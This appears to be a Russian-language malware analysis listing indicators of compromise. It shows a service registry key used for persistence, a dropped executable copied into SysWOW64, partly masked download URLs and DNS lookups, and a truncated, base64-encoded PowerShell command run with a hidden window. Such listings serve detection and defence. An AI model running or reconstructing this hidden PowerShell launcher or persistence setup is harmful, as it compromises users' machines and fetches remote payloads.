Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\nicipmi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\nicipmi] 'ImagePath' = '"%WINDIR%\SysWOW64\nicipmi.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...
- %HOMEPATH%\176.exe
- %HOMEPATH%\176.exe в %WINDIR%\syswow64\nicipmi.exe
- http://vi##sa.com/administrator/OMM4w/
- http://co###izate.com/Sitio_web/8PzLe0/
- http://19#.#7.44.48/1vcy1X1Mh8pSBydSbL
- DNS ASK de##.#oolatech.com
- DNS ASK vi##sa.com
- DNS ASK sn####lthmedico.com
- DNS ASK co###izate.com
- '%HOMEPATH%\176.exe'
- '%WINDIR%\syswow64\nicipmi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...' (со скрытым окном)